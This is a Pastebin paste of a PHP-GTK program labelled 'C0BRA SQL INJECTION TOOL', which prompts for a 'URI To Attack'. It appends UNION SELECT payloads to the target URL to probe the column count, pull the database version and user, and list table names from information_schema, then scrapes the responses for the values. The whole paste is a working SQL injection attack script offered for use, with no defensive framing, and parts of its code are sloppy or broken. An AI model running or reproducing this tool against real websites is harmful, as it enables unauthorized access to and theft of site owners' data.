API tools faq
paste
Guest User

Untitled

a guest
Apr 24th, 2018
102
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.48 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if (!class_exists('gtk')) {
  3. die("Please load the php-gtk2 module in your php.ini\r\n");
  4. }
  5. function on_interactive_dialog_clicked($aTxtBoxA,$aTxtBoxB)
  6. {
  7. $target = $aTxtBoxA->get_text();
  8. $scannerObject = new scanner($target);
  9. $table = $scannerObject->returnTables();
  10. foreach ($table as $value)
  11. {
  12.  
  13. $textBoxValue.= $value.",";
  14. }
  15. $aTxtBoxB->set_text($textBoxValue);
  16.  
  17. }
  18. $wnd = new GtkWindow();
  19. $wnd->set_title('C0BRA SQL INJECTION TOOL');
  20. $wnd->connect_simple('destroy', array('gtk', 'main_quit'));
  21. $lblCredit = new GtkLabel('Please Enter URI To Attack');
  22. $lblUsername = new GtkLabel('_Site Uri', true);
  23. $lblTables = new GtkLabel('_Tables', true);
  24.  
  25. $txtBoxA = new GtkEntry();
  26. $txtBoxB = new GtkEntry();
  27. $txtPassword = new GtkEntry();
  28. $btnAttack = new GtkButton('_Attack');
  29. $btnCancel = new GtkButton('_Quit');
  30. $btnCancel->connect_simple('clicked', array($wnd, 'destroy'));
  31. $btnAttack->connect_simple('clicked', 'on_interactive_dialog_clicked',$txtBoxA,$txtBoxB);
  32. $tbl = new GtkTable(4, 2);
  33. $tbl->attach($lblCredit, 0, 2, 0, 1);
  34. $tbl->attach($lblUsername, 0, 1, 1, 2);
  35. $tbl->attach($txtBoxA, 1, 2, 1, 2);
  36. $tbl->attach($txtBoxB, 0, 2, 2, 3);
  37. $bbox = new GtkHButtonBox();
  38. $bbox->set_layout(Gtk::BUTTONBOX_EDGE);
  39. $bbox->add($btnCancel);
  40. $bbox->add($btnAttack);
  41. $vbox = new GtkVBox();
  42. $vbox->pack_start($tbl);
  43. $vbox->pack_start($bbox);
  44. $wnd->add($vbox);
  45. $textBuffer = new GtkTextBuffer();
  46. $textView = new GtkTextView();
  47. $wnd->show_all();
  48. //Start the main loop
  49. Gtk::main();
  50. class scanner {
  51. protected $originalSiteToAttack;
  52. protected $siteStrln;
  53. function __construct($aSite = "")
  54. {
  55. $this->originalSiteToAttack = $aSite;
  56. $this->siteStrln = strlen($this->originalSiteToAttack);
  57. }
  58. private function numberOfRows()
  59. {
  60. $originalSiteToAttack = $this->originalSiteToAttack;
  61. $originalSiteToAttack.= "%20order%20by%201--";
  62. $defHtml = file_get_contents($originalSiteToAttack);
  63. for ($i=1;$i<5;$i++)
  64. {
  65. if ($i != 1)
  66. {
  67. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln);
  68. $originalSiteToAttack = $originalSiteToAttack . "%20order%20by%20$i--";
  69. }
  70. $notDefHtml = file_get_contents($originalSiteToAttack);
  71. if (strlen($notDefHtml) != strlen($defHtml))
  72. {
  73. return --$i;
  74. }
  75. }
  76. }
  77. private function buildQuery($aOption,$aTable='')
  78. {
  79. $originalSiteToAttack = $this->originalSiteToAttack;
  80. $numberOfRows = 2;
  81. //$numberOfRows = $this->numberOfRowsVar;
  82. $fieldChar = substr($originalSiteToAttack, -1);
  83. $fieldChar = "-$fieldChar";
  84. $originalSiteToAttack = substr($originalSiteToAttack , 0, $this->siteStrln-1);
  85. $originalSiteToAttack.="$fieldChar";
  86. $originalSiteToAttack .= "%20union%20select%20";
  87. switch ($aOption)
  88. {
  89. case "version":
  90. for ($i=1;$i<=$numberOfRows;$i++)
  91. {
  92. if ($i==$numberOfRows)
  93. {
  94. $originalSiteToAttack.= "@@version%20";
  95. break;
  96. }
  97. //the hex code king
  98. $originalSiteToAttack.= "@@version%20,";
  99. }
  100. $originalSiteToAttack.="--";
  101. return $originalSiteToAttack;
  102. break;
  103. case "vulnurbilityfield":
  104. for ($i=1;$i<=$numberOfRows;$i++)
  105. {
  106. if ($i==$numberOfRows)
  107. {
  108. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  109. break;
  110. }
  111. //the hex code king
  112. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  113. }
  114. $originalSiteToAttack.="--";
  115. return $originalSiteToAttack;
  116. break;
  117. case "dbuser":
  118. for ($i=1;$i<=$numberOfRows;$i++)
  119. {
  120. if ($i==$numberOfRows)
  121. {
  122. $originalSiteToAttack.= "user()";
  123. break;
  124. }
  125. //the hex code king
  126. $originalSiteToAttack.= "user(),";
  127. }
  128. $originalSiteToAttack.="--";
  129. return $originalSiteToAttack;
  130. break;
  131. case "numberoftables":
  132. for ($i=1;$i<=$numberOfRows;$i++)
  133. {
  134. if ($i==$numberOfRows)
  135. {
  136. $originalSiteToAttack.= "COUNT(*)";
  137. break;
  138. }
  139. //the hex code king
  140. $originalSiteToAttack.= "COUNT(*),";
  141. }
  142. $originalSiteToAttack.="%20from%20information_schema.tables--";
  143. return $originalSiteToAttack;
  144. break;
  145. case "tables":
  146. for ($i=1;$i<=$numberOfRows;$i++)
  147. {
  148. if ($i==$numberOfRows)
  149. {
  150. $originalSiteToAttack.= "table_name";
  151. break;
  152. }
  153. //the hex code king
  154. $originalSiteToAttack.= "table_name,";
  155. }
  156. $originalSiteToAttack.="%20from%20information_schema.tables%20limit%20$aTable,1--";
  157. return $originalSiteToAttack;
  158. break;
  159. }
  160. }
  161. private function numberOfTables()
  162. {
  163. $originalSiteToAttack = $this->buildQuery("numberoftables");
  164. $defHtml = file_get_contents($originalSiteToAttack);
  165. $relPosition = $this->locateVulnFieldPos();
  166. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  167. }
  168. private function versionNumber()
  169. {
  170. $originalSiteToAttack = $this->buildQuery("version");
  171. $defHtml = file_get_contents($originalSiteToAttack);
  172. $relPosition = $this->locateVulnFieldPos();
  173. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  174.  
  175. }
  176. private function dbUser()
  177. {
  178. $originalSiteToAttack = $this->buildQuery("dbuser");
  179. $defHtml = file_get_contents($originalSiteToAttack);
  180. $relPosition = $this->locateVulnFieldPos();
  181. return substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  182. }
  183. private function locateVulnFieldPos()
  184. {
  185. $originalSiteToAttack = $this->buildQuery("vulnurbilityfield");
  186. $defHtml = file_get_contents($originalSiteToAttack);
  187. $pos = strpos($defHtml, "king");
  188. return $pos;
  189. }
  190. public function returnTables()
  191. {
  192. $numberOfTables = $this->numberOfTables();
  193. for ($i=0;$i<=4;$i++)
  194. {
  195. $originalSiteToAttack = $this->buildQuery("tables",$i);
  196. echo $originalSiteToAttack."\n";
  197. $defHtml = file_get_contents($originalSiteToAttack);
  198. $relPosition = $this->locateVulnFieldPos();
  199. $arrayToReturn[$i] = substr($defHtml,$relPosition,10); //echo $originalSiteToAttack;
  200. }
  201. return ($arrayToReturn);
  202. }
  203. private function findVulnField()
  204. {
  205. $originalSiteToAttack = $this->originalSiteToAttack;
  206. $originalSiteToAttack .= "%20union%20select%20";
  207. $siteStrln = $this->siteStrln;
  208. $pattern = '/&.*/';
  209. preg_match($pattern, $originalSiteToAttack, $matches);
  210. $explodedGets = explode("&",$matches[0]);
  211. //$numberOfRows = $this->getNumberOfRows();
  212. $numberOfRows = 2;
  213. for ($i=1;$i<count($explodedGets);$i++)
  214. {
  215. $pos = strpos($explodedGets[$i], "=");
  216. $pos++;
  217. $strCutedA = substr($explodedGets[$i], 0, $pos);
  218. $strCutedB = substr($explodedGets[$i], $pos, strlen($explodedGets[$i]));
  219. $strCutedB = preg_replace('/%.*/', "", $strCutedB);
  220. $explodedGetsB[$i] = $strCutedA."-".$strCutedB;
  221. }
  222.  
  223. for ($i=1;$i<=count($explodedGetsB);$i++)
  224. {
  225. echo "$$$$$$$".$i."\n";
  226. $originalSiteToAttack = str_replace($explodedGets[$i],$explodedGetsB[$i],$originalSiteToAttack);
  227. for ($j=1;$j<=$numberOfRows;$j++)
  228. {
  229. if ($j==$numberOfRows)
  230. {
  231. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67)";
  232. //break;
  233. }
  234. //the hex code king
  235. $originalSiteToAttack.= "CHAR(0x6775797468656b696e67),";
  236. }
  237. $originalSiteToAttack.="--";
  238. echo $originalSiteToAttack."\n";
  239. //$defHtml = file_get_contents($originalSiteToAttack);
  240. //$pos = strrpos($defHtml,"king");
  241. //echo $pos;
  242. }
  243. }
  244. public function getVulbField()
  245. {
  246. $this->vulnField = $this->findVulnField();
  247. return $this->vulnField;
  248. }
  249.  
  250. public function getVersionNumber()
  251. {
  252. $this->dbVersion = $this->versionNumber();
  253. return $this->dbVersion ;
  254. }
  255.  
  256. private function getNumberOfRows()
  257. {
  258. $this->numberOfRowsVar = $this->numberOfRows();
  259. return $this->numberOfRowsVar."\n";
  260. }
  261. public function getUser()
  262. {
  263. $this->dbUserField = $this->dbUser();
  264. return $this->dbUserField;
  265. }
  266. private function getNumberOfTables()
  267. {
  268. $this->numberTables = $this->numberOfTables();
  269. return $this->numberTables;
  270. }
  271. private function getTables()
  272. {
  273. $numberOfTables = $this->getNumberOfTables();
  274. }
  275. public function __toString()
  276. {
  277. return $this->originalSiteToAttack;
  278. }
  279.  
  280. }
  281.  
  282. $arguments = getopt("t:d:");
  283. $target = $arguments["t"];
  284. $db = $arguments["d"];
  285. //$scannerObject = new scanner($target);
  286. //echo $scannerObject->getVersionNumber();
  287. //echo $scannerObject->getUser();
  288. //echo $scannerObject->returnTables();
  289. //echo $scannerObject->getVulbField();
  290. //for ($i=0; $i<strlen($string); $i++) {
  291. // echo $string[$i];
  292. //}
  293.  
  294.  
  295. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!